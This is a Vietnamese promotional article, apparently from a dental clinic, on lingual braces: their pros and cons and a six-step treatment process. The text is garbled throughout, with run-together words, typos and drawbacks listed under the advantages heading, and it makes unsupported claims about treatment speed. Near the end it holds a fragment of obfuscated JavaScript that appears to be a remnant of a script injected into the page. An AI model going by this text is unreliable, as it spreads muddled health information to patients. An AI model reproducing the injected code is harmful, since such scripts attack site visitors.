Niềng răng mắc cài mặt trong – biện pháp chỉnh nha an toàn, hiệu quả tốt nhất

Giải pháp niềng răng mắc cài mặt trong ra đời nhằm cung cấp nhu cầu về mặt thẩm mỹ khi niềng răng. phương pháp này ngày càng được mọi người trông cậytìm lựa áp dụng. Vậy thực hư niềng răng mặt trong có hiệu quả ko; bài viết bên dưới đây sẽ giúp bạn biết rõ được vấn đề đó

A. Phương pháp niềng răng mặt trong là gì?

Phương pháp niềng răng mắc cài mặt trongphương pháp niềng răng mới, thay thế vì dây cung được lắp bên ngoài răng thì giải pháp này niềng răng lại được mắc vào bên trong để nắn chỉnh nha

Niềng răng mắc cài mặt trong - Phương pháp chỉnh nha an toàn, hiệu quả cao 1

Niềng răng mắc cài mặt trong là giải pháp hiệu quả và tối ưu bảo đảm giúp bảo đảm tính thẩm mỹ ngay cả khi niềng răng, người đối diện khó tìm ra bạn đang thực hiện niềng răng.

B. Ưu nhược điểm của giải pháp niềng răng mặt trong

Ưu điểm niềng răng mắc cài mặt trong

>>> Thông tin chi tiết về giá niềng răng bây giờ

−Niềng răng mặt trong đảm bảo tính thẩm mỹ cho hàm răng ngay cả khi bạn niềng răng. Mắc cài được mắc bên trong răng nên thường khó bị phát hiện khi niềng răng.

−Phương pháp này mang đến hiệu quả chữa trị nhanh chóng hơn, thời gian niềng răng có thể rút ngắn xuống từ 16 tháng tới 18 tháng.

−Phù hợp với những người niềng răng dù ở tuổi trưởng thành khi mà phần xương hàm đã phát triển hoàn thiện.

−Việc ăn nhai gặp nhiều bất tiện, khi ăn thức ăn có thể làm đau đớn, giúp cho bữa ăn không ngon miệng. tình trạng này khó khắc phục và có thể kéo dài đến khi tháo niềng.

−Khả năng phát âm khi nói chuyện của bạn có thể bị tác động do dây cung dễ chạm vào lưỡi, thậm chí khi nói chuyện có thể làm đau.

−Vệ sinh răng miệng gặp phức tạp; thực phẩm dễ mắc vào mặt trong của dây cung, nguy cơ mắc bệnh hôi miệng cao.

C. Niềng răng mắc cài mặt trong được áp dụng như thế nào?

Cũng giống như niềng răng thẩm mỹ thông thường, phương pháp niềng răng mặt trong được thực hiện với quy trình gồm 6 bước cơ bản.

−Chụp X Quang cho răng: bác sỹ sẽ tiến hành chụp Xquang bằng máy Cone Beam CT 3D cho để điều tra hiện tượng xương, răng và giải đáp hướng chữa cho người mắc bệnh.

−Lên kế hoạch điều trị: bác sỹ sử dụng phần mềm Vceph 3D để phân tích và ước định quá trình dịch chuyển của răng và dự kirrd thời gian răng về đúng đắn vị trí như mong muốn.

−Ký hợp đồng niềng răng: người bệnh sẽ được ký hợp đồng thời thời gian niềng răng và kết quả niềng răng để đảm bảo về mặt kết quả.

−Lấy mẫu dấu hàm, vệ sinh răng miệng: Răng miệng sẽ được vệ sinh thật kỹ trước khi tiến hành lấy mẫu dấu hàm gửi lên labo để thiết kế niềng răng.

−Tiến hành niềng răng: bác sĩ sẽ gắn mắc cài niềng răng vào mặt trong của răng cho bệnh nhânkhởi đầu quy trình niềng răng.

−Hướng dẫn chăm sóc: người mắc bệnh sẽ được chỉ dẫn cách chăm chút mắc cài niềng răng tại giacách vệ sinh răng miệng.

Mọi băn khoăn về niềng răng mắc cài mặt trong hay niềng răng mặt trong có tốt ko bạn vui lòng liên lạc với chúng tôi để có giải đáptrả lời băn khoăn từ chuyên gia nha khoa hàng đầu. \- navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Phạm Ngọc Hoàng

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *